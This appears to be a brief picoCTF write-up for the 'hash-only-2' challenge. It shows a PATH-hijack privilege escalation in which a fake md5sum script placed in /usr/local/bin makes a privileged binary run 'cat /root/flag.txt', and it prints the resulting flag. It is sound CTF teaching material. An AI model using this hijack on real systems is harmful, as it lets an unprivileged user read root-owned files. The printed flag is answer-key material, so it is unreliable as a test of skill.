Post

hash-only-2

Posted
By Elijah Lieu
1 min read

Description

Here is a binary that has enough privilege to read the content of the flag file but will only let you know its hash. If only it could just give you the actual content!

Initial analysis

We appear to be in another shell than bash. This restricts us from using I/O redirection and using cd, but we can just run bash.

Now, /usr/bin/md5sum is not writeable. However, we can write somewhere higher in the PATH: /usr/local/bin.

1
2
3

echo '#!/usr/bin/bash' > /usr/local/bin/md5sum
echo 'cat /root/flag.txt' >> /usr/local/bin/md5sum
chmod u+x /usr/local/bin/md5sum

Flag

1
2
3

Computing the MD5 hash of /root/flag.txt.... 

picoCTF{Co-@utH0r_Of_Sy5tem_b!n@riEs_9bde33ed}
ctf pico pwn writeup
This post is licensed under CC BY 4.0 by the author.